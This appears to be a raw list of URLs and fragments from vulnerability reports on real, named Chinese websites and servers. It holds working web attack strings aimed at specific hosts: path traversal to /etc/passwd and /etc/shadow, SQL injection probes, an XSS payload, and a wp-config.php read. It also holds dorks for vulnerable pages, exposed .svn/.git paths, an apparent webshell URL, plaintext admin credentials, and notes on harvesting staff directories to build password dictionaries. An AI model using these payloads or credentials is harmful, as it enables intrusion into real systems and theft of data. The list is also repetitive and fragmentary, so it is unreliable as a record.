http://www.sxsfgl.gov.cn/2015sxsfgl/gzfw_lkshow.php?id=13 https://github.com/callmeharry/pelican/blob/9135d9fe6e8b065e5fdec248fb6d795f0b3b9386/pelican/lib/mail/test/test.js http://www.vcyber.com:80/ www.vcyber.com http://www.veaka.com/veaka.zip http://jf.minxindai.com/ http://jf.minxindai.com/jfAddress/findJfAddressList.mxd http://jf.minxindai.com/jfAddress/toEditJfAddress.mxd?addressId=1644 http://120.132.154.11:8080/web/rdlogin.jsp http://120.132.154.11:8080 http://www.haohaizi.com/ http://**.**.**.**:8088/Message/mView.aspx?mId=4&type=2 http://**.**.**.**/Message/mView.aspx?mId=4&type=2 http://**.**.**.**/Message/mView.aspx?mId=4&type=2 http://wo.cn http://passport.wo.cn:30000/favorite-hot-videos/myfavorite.do http://www.fjbs.gov.cn http://www.fjbs.gov.cn/eWebEditor/admin/login.jsp http://www.fjbs.gov.cn/eWebEditor/admin/upload.jsp?id=0&dir=../../ http://www.gz96833.com/comqnaList.action?dictid=1&flag=1 http://www.gz96833.com/useGasTypeList.action?dictid=1&flag=1 http://www.gz96833.com/useGasTypeListView.action?fid=326&typeid=2&detailid= http://www.nx.gov.cn/member/memberSysm.htm URL:http://campus.globalmarket.com/phpmyadmin/ root:globalmarket http://**.**.**.**/t_lyxxb_Action.do?TASK=select_self http://**.**.**.**//t_lyxxb_Action.do?TASK=select_self http://**.**.**.**:8080//t_lyxxb_Action.do?TASK=select_self index.php/Home/Facebooklike/join http://zxx.eyougame.com/ http://121.15.254.21/login.shtml存在注入漏洞,参数uid inurl:gov.cn/news_info.asp?id= http://www.dyhlw.gov.cn/News_info.asp?ID=5401 http://www.lzsmzj.gov.cn/news-info.asp?id=398'&cataid=1 http://www.yjjs.gov.cn/news_Info.asp?rs_id=7455 http://fhoaf.gov.cn/news_info.asp?id=2960 http://www.fhagri.gov.cn/xmsb/news_info.asp?id=2693 http://www.tnwsj.gov.cn/ShowNewsInfo.asp?news_id=638'&type_parid=,459 http://tjdata.haimen.gov.cn/chart_singleDataList.do?type=index http://tjdata.haimen.gov.cn/chart_economicDataList.do?type=index http://help.51web.com/download页面 http://help.51.com/download/../../../etc/passwd http://help.51web.com/download/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd http://222.168.22.56:443/Conf/jsp/main/mainAction.do http://222.168.22.58:443/Conf/jsp/main/mainAction.do https://github.com/zh69183787/dp-shopdiy/blob/7bef004037b7bfa96d91b578d2fe7e894c9a007b/shopdiy-biz/src/main/java/com/dianping/midas/shopdiy/biz/util/Mails.java http://xy.jaswzzb.com/bmadmin/index.asp http://1.184.208.123/index.php http://1.184.208.123/wooyun.php http://119.254.70.121/bull/toBullAuthentication.html http://119.254.70.121 http://bh.szdiyibo.com/index.php?a=newlist&term=3 inurl:FlightOrderDetail.asp http://www.glgoo.com/search?q=inurl%3AFlightOrderDetail.asp http://ucenter.egou.com/data/config.inc.php http://www.xlfy.org/iweb/show.action http://61.158.214.4/epg/template/template705/pv.php?movieid=4618257&sid=0.5 http://61.158.218.17/epg/template/template705/pv.php?movieid=4618257&sid=0.5 http://61.158.215.201/epg/template/template705/pv.php?movieid=4618257&sid=0.5 http://61.158.215.145/epg/template/template705/pv.php?movieid=4618257&sid=0.5 http://61.158.214.35/epg/template/template705/pv.php?movieid=4618257&sid=0.5 www.jxlife.com.cn/online/shs/csinquiry/DocumentQuery/search/download.jsp?fileName=968_1388365801357.pdf&filePath=L2FwcC9XZWJTcGhlcmUvc2hhcmUvbWlzL3VwbG9hZA== www.jxlife.com.cn/online/shs/csinquiry/DocumentQuery/search/download.jsp?filePath=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n http://bhmc.szdiyibo.com/index.php?g=admin&m=public&a=login http://activecard.zsins.com:7011/iss_dbwebins/ec/alltrustcard/cardRegister.jsp http://activecard.zsins.com:7011/iss_dbwebins/bs/login.jsp https://github.com/rh20083907/maven-demo/blob/2b6bacd71601403381886b0c5ab562f7098dc29f/maven-core/src/main/java/com/jeary/maven/core/mail/SendMail.java inurl:http://map.baidu.com/detail?qt=movie&act=detailpc http://duoyunlai.baoogu.com/supplier/searchDeliveryById.htm?id=4263 http://www.zgsms.net/ https://github.com/unicomdog/baolizhibiao/blob/e5ed6113e9d1d9b1736ebf26e69b866e23f8a77b/BB_Maker.py http://shop.povos.com.cn/eshop/povosdg/order_info.jsp?order_no=SO2015062700005 http://scm.365pp.com/Login/Index username:admin password:123qwe!@# http://ekp.joyu.com/ Url:http://www.test.sfn.com.cn/index.php/admin/ http://www.hk.chinaunicom.com/.svn/entries http://www.whfao.gov.cn/gonggaonew.jsp http://www.whfao.gov.cn/news.jsp http://www.whfao.gov.cn/newshow.jsp http://www.whfao.gov.cn/newshow.jsp http://a.g.gomesell.com/login/login.action https://m.zrcaifu.com/login http://rddp.midea.com.cn:9083/rtssh/LoginAction.action http://58.252.101.42:9083/rtssh/LoginAction.action http://**.**.**.**/tzptweb/powercode/power_importdocuments_list_page.aspx http://**.**.**.**/powercode/power_importdocuments_list_page.aspx http://lz.eroadsoft.com/Default.aspx http://192.168.168.1/login/x www.ikuai8.com http://365.wo.cn/ http://www.feijipiao.cn http://www.feijipiao.cn/Account/Login http://m.lashou.com/retrievePwd.php http://price.xcar.com.cn/serise1089/city1038-1-1.htm?is_cms=15&pop=open&mid=10853 http://passport.cnmo.com/register/email/11109050 http://club.hhedai.com/uc_server/admin.php http://leleshan.leyou.com.cn/user/findpwstep1 http://kf.backend.playcrab.com/assign/index http://kf.backend.playcrab.com/assign/index http://kf.backend.playcrab.com/assign/index http://i.49you.com/news/item/catid/55/id/15* http://gm.49you.com/order/line/rid/15158.html http://svn.49you.com/.bash_history com:7002 com:7002/ePay/order_toOrderHis http://**.**.**.**/bugs/wooyun-2015-0109795前人洞而发 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**//sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**//sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**//sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**//systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**//sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://211.138.195.223:9090/webapi/plugin?cls=/../../../../../../../../../../../../etc/passwd%00.html http://211.138.195.223:9090/webapi/plugin?cls=/../../../../../../../../../../../../etc/shadow%00.html http://leleshan.leyou.com.cn/user/login http://**.**.**.**/bugs/wooyun-2015-0117270之后另一处: http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/activiList.aspx?ActiviId=13%20and%201%3E@@version-- city.chinago.cn/do/activity/activity.php?op=1 www.sipf.com.cn) http://www.sipf.com.cn/bin/Order?m=nwod&filePath=/upload/APPSERVERMNG001/publicatoin/eJournal//1221108775468786.pdf&fileName=%D6%D0%B9%FA%D6%A4%C8%AF%CD%B6%D7%CA%D5%DF%B1%A3%BB%A4%BB%F9%BD%F0%D4%CB%D7%F7%C4%A3%CA%BD%D1%D0%BE%BF http://www.sipf.com.cn/bin/Order?m=nwod&filePath=/upload/APPSERVERMNG001/publicatoin/eJournal//../../../../../../../etc/passwd&fileName=passwd http://ady.oa5.meetok.com/Account/AddressMng.aspx http://e.zol.com.cn/ http://e.zol.com.cn/Default/Check/ http://113.240.245.42:8081/A430121chss/chss.html# http://tvp.multimedia.tcl.com/sysadmin/login.aspx http://tvp.multimedia.tcl.com/UploadFiles/Images/2015/6/20150628152911.aspx http://i.49you.com/company/index/catid/43*.html http://i.49you.com/company/index/catid/43%20and%201=1.html http://i.49you.com/company/index/catid/43%20and%201=2.html http://www.lemonsay.com/ShopList.aspx?dl2=%E5%A4%A7%E4%B8%9C%E6%B5%B7 www.epicc.com.cn http://122.224.110.186:8888/MediinfoOA/login.aspx http://www.jx.10086.cn/xxt/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://www.jx.10086.cn/xxt/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://www.jx.10086.cn/xxt/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://www.cooli.cn/HelpCenter/Help_index.aspx?help=0101 www.49you.com http://i.49you.com/news/item/catid/55*/id*/15*.html http://i.49you.com/news/item/catid/55*/id*/15*.html http://sqlmap.org http://www.class.cn/reset_passwd/reset_show?key=bqdv9A3ktekWdqkEB8np&email=48930141@qq.com http://www.class.cn/reset_passwd/reset_show?key=tXljtZaJt3kUa679CB4p&email=602779689@qq.com http://www.china-tax.org/about_study.asp?classid=68 http://125.39.194.15/user/login.action http://125.39.216.165/user/login.action brief_www-----http://www.ikanshu.cn/ brief_admin---http://admin.ikanshu.cn/ www.lntzb.gov.cn IP:218.60.144.211 http://www.lntzb.gov.cn/web/FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.ttrc.gov.cn/jeecms/tag/person/Com_personInfo.do?infoID=4000 http://www.ttrc.gov.cn/jeecms/tag/person/Com_personInfo.do?infoID=18100 http://www.qimingzhongheng.com/hprp/usr/login.action site:51job.com inurl:loginname= http://www.51job.com/shenzhen?passport_loginname=15575376425&passport_password=zhuben456123&submit=%B5%C7%C2%BC http://admin.chinac.com/phpmyadmin/ http://online.suning.com/console/ http://m.dajie.com/resume/edit/practice?id=7426410&redir=/resume/index http://m.dajie.com/corp/1037249/discuss/101501?fromType=index http://order.yao.app.xywy.com/UserOrderManage/contactManage http://order.yao.app.xywy.com/ContactAddress/ajaxAddAddress http://116.213.178.99/.git/config http://116.213.178.99/.git/ url:http://bbs.xiaolajiao.com/space-uid-227015.html http://www.doc88.com/.svn/entries http://xuanwu.changba.com/ http://www.gdhydro.com/MaritimeManage/portal/n http://ac.cnas.org.cn/cnas/jsp/mr2certinfo/personinfo.jsp?orgId=1000000066&orgName=&year=2009&month=02 http://gs.cqupt.edu.cn/adminv612/ http://gs.cqupt.edu.cn/ajax/content.aspx?cType=soft&id=22&oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF爆出物理路径如图 http://gs.cqupt.edu.cn/file.axd?file=D:\Web_Smylv\_data\config\conn.config即可下载数据库配置文件 http://oa.leyou.com.cn/app/cooperation/reply/replycoworklist.jsp?requestid=f3368c6e4700f2c5014715c047d20063 http://online.suning.com/console/ http://www.easybonuscard.com/.svn/entries http://www.in89.com.tw/news.php?nid=73 http://www.in89.com.tw/ticket.php?pid_for_show=4670 http://www.in89.com.tw/website_module.php?website_module_classify_sn=34 http://www.in89.com.tw/news.php?nid=73 http://**.**.**.**/bugs/wooyun-2015-0108515而发 http://**.**.**.**:81/issue/news_more.jsp?Urltype=4 http://**.**.**.**/issue/news_more.jsp?pagestr=2&key=&Urltype=11 http://**.**.**.**/issue/news_more.jsp?Urltype=6 http://**.**.**.**/issue/news_more.jsp?Urltype=4 http://**.**.**.**/issue/news_more.jsp?Urltype=4 http://**.**.**.**/issue/news_more.jsp?pagestr=2&key=&Urltype=4 http://task.weimob.com/secure/BrowseProjects.jspa http://bable.weimob.com/dashboard.action http://qa.weimob.com/.svn/entries http://112.124.57.112:9999/.svn/entries http://112.124.28.82:9999";//邮件内容 http://112.124.57.112:88/install/index.php http://www.qhhrm.cn/zscx.asp http://www.qhhrm.cn/zscx/S-2.asp www.qhhrm.cn http://openbox.mobilem.360.cn/daren/detail?id=28623 http://user.weifengke.com/uact/seekPwd http://user.weifengke.com/uact/resetpwd?uid=19640529&sole_code=t5rwNE http://www.mangocity.com/index.php?d=search&c=search_controller&m=index&keyword= http://bbs.leyou.com.cn/bbs_space.tar.gz http://bbs.leyou.com.cn/bbs_uc.tar.gz http://120.55.125.159/ http://www.bjmakerspace.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php site:xhd.cn inurl:action?order.orderNo= http://idea.open.com.cn/search/1-1-1.aspx?PPBOX* http://www.codoon.com/backend/friendsrc http://www.xinyuejunxi.com/ https://api.leancloud.cn/1.1/users?include=pictures,avatar&where={"objectId":"5582c1b2e4b04ccce3c7b248 http://ac-mp4nefs1.clouddn.com/sq3VNKTpvAVDwAfWSAiVMRA.jpg http://ac-mp4nefs1.clouddn.com/lGEmCHAZ7xDzTJ61cemVDtC.jpg http://ac-mp4nefs1.clouddn.com/rnEPceAPapY5hS2PQSsjRrD.jpg http://ac-mp4nefs1.clouddn.com/Wr543ISR2EIdILMgTSsRHtD.jpg http://ac-mp4nefs1.clouddn.com/sq3VNKTpvAVDwAfWSAiVMRA.jpg https://email.creditease.cn/ http://**.**.**.**/bugs/wooyun-2015-0109946有感而发 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**:8030/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**//DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://www.scjst.gov.cn/WebPage/infofulltextsearch.html?keyword='&selectedSearchCategory=0 http://veepalms.open.com.cn/Home/Login http://baike.meadin.com/history/?hid=33582 http://**.**.**.**/index/index_partners.action http://**.**.**.**/xq5u/ http://**.**.**.**/demo http://**.**.**.**/xq5u/index/index_activation.jhtml http://**.**.**.**/xq5u/index/index_activationEn.jhtml http://www.haoshili.com.cn/brand_information.php?fid=2 http://www.haoshili.com.cn/brand_information_show.php?id=2 http://www.haoshili.com.cn/gongyi1.php?id=2 http://www.haoshili.com.cn/gongyi_show.php?id=2 http://www.haoshili.com.cn/shop/index.php?sorts=2 http://www.haoshili.com.cn/zhuanqu/article_frame.php http://www.haoshili.com.cn/zhuanqu/eye2_frame.php http://www.haoshili.com.cn/zhuanqu/eye3_frame.php http://www.haoshili.com.cn/zhuanqu/eye4_frame.php http://www.haoshili.com.cn/zhuanqu/eye_frame.php?id=361&page=1 http://www.haoshili.com.cn/shop/experts.php?act=list&page=\ http://www.haoshili.com.cn//shop/goods.php?id=274&page= http://www.haoshili.com.cn//shop/index.php?act=sort http://www.yicai.com/user/do.php?ac=lostpasswd®mode=mobile magic.360.cn/.git/config http://nongjibao.189.cn/login2.jsp http://www.szwen.gov.cn/culture.jsp http://www.szcf.org.cn ftp://203.91.45.52/ http://www.mangocity.com/product/10506752p2.html?type=90&c=cholidayindexcontroller&m=comindex&d=grouptravel URL:http://www.dyjywx.com/index.action URL:http://222.186.112.4/xbk/Index.aspx http://www.ihxlife.com/user/toLogin.do http://www.ettoday.net/events/fifa2014/live.php?id=62 SVN:http://castest.xbwl.cn:9090/job/PUMA2.0_REPORT/ws/.svn/entries http://castest.xbwl.cn:9090/job/PUMA2.0_REPORT/ws/ jdbc:oracle:thin:@//183.62.248.82:1521/puma jdbc:oracle:thin:@//192.168.8.220:1522/xbwl http://wsb.tcl.com/shenwebnew/manager/login.asp http://client.weimai.com/weimai/s/order/order.json?id=11111111&orderid=10110017&buytoken=undefined&token=1111111111111111111111&_=1435552306440 http://www.tp-linkshop.com.cn/ http://v.baidu.com/v?word=%3Cimg+src%3Dx+onerror%3Dalert%2821212%29%3E&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=utf-8 http://www.jlsjsaq.cn/ http://114.215.128.65:8036/Main/p1.aspx?n= http://114.215.128.65:8001/ http://114.215.128.65:8036/ http://114.215.128.65:8001/ http://114.215.128.65:8003/ http://114.215.128.65:8002/ http://pic.xnnews.com.cn/View_GroupPhoto.asp?id=3533 http://itoms.open.com.cn/Admin/login.aspx http://1dui1.huatu.com/ydyzs.php http://www.ineice.com/ http://fs.ineice.com/detect/icon/ www.ineice.com http://www.ineice.com http://hui.vcyber.com:80/comm/commlist?CommName=-1&CommTypeID=&IYN=Y&PageNum=e&sellPrice=&time=1435561541208&TJType=5&ZCount=&_=1435561576234 http://www.leyou.com.cn/mob/getAddress?token=15e2ecf73e2b4c7f242f38461012bcb3&userId=3431171&pageIndex=1&pageSize=10 http://hui.vcyber.com:80/ IP:60.28.210.223 IP:60.28.210.239 http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**:8081/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/ks/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://config.kuwo.cn/config/ http://config.kuwo.cn/usage/ http://60.10.8.227:88 http://ydx.shnu.edu.cn/%284nm0au550olsjhvyzgmsob55%29/ggsm.aspx?fbsj=2011-03-28%2015:56:17&yxqx=2022-03-29&xh=5 https://111.205.11.29 https://111.205.11.28 http://218.7.196.61/hljcsyxzm/index.aspx http://oa.leyou.com.cn:80/ http://www.ztekj.com/ http://wooyun.org/bugs/wooyun-2010-041699 http://www.ztekj.com/deploy/management/console.war/jsp_info.jsp,可以执行命令: http://fcdr.zhcw.com/index.php/Person/index/uid/284 http://**.**.**/ http://cg.lashou.com/new_index.php?class=Stat&goods_id=10121973&fd_id=39355 http://oa.leyou.com.cn/ http://oa.leyou.com.cn:9002/jmx-console http://www.x.com.cn/ http://sh.suning.com/life/tom/payment/memtrans-payment!prePay.action?orderNo=2015062900231169 http://www.chinanetwork.com.cn/w8/w8.zip https://mail.letv.com http://shop1.x.com.cn/save_orders.php?id_code=XA150629215367 http://115.29.164.115/?code=yxkj http://115.29.164.115/v3_mms_send_pre/mmsfile/res/images/1435578187937.php http://its.zte.com.cn:80/dms/uiloader/login.aspx www.zjhz.lss.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/struts-config.xml www.zjhz.lss.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/struts-sysmanager.xml http://edu.baidu.com/ http://edu.baidu.com/taoli/resource/activity/activityManagge.jsp http://www.bitcomet.com/.svn/entries http://img11.homemall.com.cn/group1/M01/3A/0E/ooYBAFPh-iyAOIWHAAHWSFYRekM071_65x65.jpg http://p.hiall.com.cn/data.rar http://www.mangocity.com/product/10506752p2.html http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print http://oa.glsc.com.cn:10040/wps/portal,此处可用常用用户名和弱密码123456获得某个账号,再从中获取全公司通讯录(导出方法是从右上角“搜索电子通讯录”处输入通配符"%",再进行导出,包括公司所有人员联系方式,公司董事长及其他高管电话、邮箱应有尽有),将其重新做一个用户名字典,用公司论坛中通知修改的新默认密码和其它弱密码进一步获取账号若干。搜了下以前的漏洞,发现 http://s.xbiao.com/map?id=270 http://www.fcggjj.com/防城港市住房公积金 http://www.xygtzyj.gov.cn/admin/ywjggs/zl_ywjggsMore.asp http://claim.sinosafe.com.cn:15080/ http://home.xywy.com/user.php?act=addgroup http://mis.gd118114.cn/ http://fob.xywy.com http://shop.leishen.cn http://shop.leishen.cn/shell.php http://wb.99.com http://localhost:8081/index.php?s=member&c=info&a=avatar https://mail.qiyi.com http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601 http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601 http://mantis.xywy.com/login_page.php url:http://ecard.sysu.edu.cn/Account/Bind/rqTxggupLVF9bQS-r6AxDsCiSMUUC5BH4GePdkU58VA%3d http://m.xinguodu.com:89 http://www.chinabed.com:89/ http://wap.helichina.com/ http://m.ccccie.com http://hz.cofcopack.com/ http://www.jdyfy.com:89/login.do http://woa.lanju.cn http://www.dngroup.cn:89/ http://emobile.ldjt.com.cn http://mail.lanju.cn/ http://m.jiaxun.com/ http://oa.joincare.com.cn:89 http://m.zxhsd.com/ http://www.i-waiter.cn/index.jsp http://zu.wuhan.fang.com/login.aspx?furl=/rent/UserCenter/MyInputHouse.aspx?businesstype=CZ&housetype=JX这个接口看到没有验证码限制 http://221.214.92.82/ http://221.214.92.83/ http://221.214.92.79:8080/jfjz/ http://221.214.92.79:8080/ http://221.214.92.82/ http://tg.g.v1.cn/.svn/entries http://cloud.zte.com.cn/html/login.html www.22.cn www.22.cn http://today.itjuzi.com:80/ http://119.90.59.128/index.php?a=login http://119.90.59.128/index.php?a=login&c=../../../../../../../../../../etc/passwd%00.jpg http://123.139.154.143/tclc/USERLogin.action?condition=%257B%2522LOGINNAME%2522%253A%25221%2522%252C%2522PASSWORD%2522%253A%25221%2522%252C%2522ip%2522%253A%2522%2522%252C%2522refer%2522%253A%2522%2522%257D http://123.139.154.143/tclc/wooyun.txt http://www.art.hbnu.edu.cn/userfiles/file/front_read.action http://samsungbbs.cnmo.com http://www.hljgljl.gov.cn:80/module/jslib/jquery/jpage/dataproxy.jsp?unitid=1 http://dzqd-oa.10010.com/,中国联通电子商务部管理平台,此处验证码可重用,用猪猪侠的常用用户名可获取几个账号,登陆后在全国通讯录可查看联通电子商务全国员工联系方式,将收集的邮箱做成字典,可对邮箱进一步进行破解。 http://202.111.44.69/zcgx/login.jsp永城财险整车数据自动更新系统 http://www.coastalbank.cn/ http://www.coastalbank.cn/yh_yh_admin_yk/lyan1/veiw.php?id=22 http://**.**.**.**:10000/ http://**.**.**.**/ http://**.**.**.**:81/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/epaper/test/login.jsp http://**.**.**.**:8080 country:China http://122.224.89.219/mms/musicManager.jsp http://61.233.42.78/mms/musicManager.jsp http://61.153.181.190:81/mms/musicManager.jsp http://61.236.195.164/mms/musicManager.jsp http://61.233.42.73/mms/musicManager.jsp POST:musicType=0&musicByname=0 POST:musicTypeadmin=0 POST:picTypeadmin=0 POST:picType=0 http://kaoshi.centfor.com/ http://kaoshi.centfor.com http://www.gydyej.gov.cn:8081/Search.aspx?key=1&orgid=28798 http://wooyun.org/bugs/wooyun-2010-092390 http://v.m.joy.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/resin-web.xml http://sse.eln.com.cn:80/reg/checkname.php?gsid=&value=1 http://ting.weibo.com/music/show/showlist?location=35 http://ting.weibo.com/music/show/showlist?location=35 http://115.28.47.160:90/.svn/entries http://115.28.47.160:6001/.svn/entries http://115.28.47.160:3000/.svn/entries http://115.28.47.160:7777/.svn/entries http://www.imooc.com/myclub/opus http://itoms.open.com.cn/Admin/login.aspx http://yytxl.cn/wap/wap_login.aspx?submit=true http://yytxl.cn/wap/ http://221.1.83.202:81/ admin:123456 android:name="com.igexin.download.DownloadReceiver android:name="android.net.conn.CONNECTIVITY_CHANGE"/ http://etcom.cn/customerService/loginAction.action http://112.53.79.139:9085/Ztesweb/,被提交过一个后台万能密码,已经修复了,略失望,但是发现了一个上传点,http://112.53.79.139:9085/Ztesweb/admin/upload.jsp: http://112.53.79.139:9085/Ztesweb/upload/config.jsp,已经不是处女地了,14年就被拿下了,伤心: http://58.213.19.30/forum.php http://drops.wooyun.org/papers/2893 http://today.itjuzi.com:80/ http://www.xiangshe.com/my/Ordercancel.do?orderid=201506301522501387 http://www.picooc.com/.svn/entries http://bbs.picooc.com/.svn/entries https://pcs.baidu.com/rest/2.0/structure/table http://sdk2.sudas.cn:8060/z_mdsmssend.aspx http://sdk2.sudas.cn:8060/z_balance.aspx http://api.map.baidu.com/location/ip www.picooc.com";//网站url http://111.160.204.56/manager/html http://oa.scxxt.com.cn/manager/html http://www.yancaosuo.com/manager/html http://www.gxntjz.cn:8088/manager/html 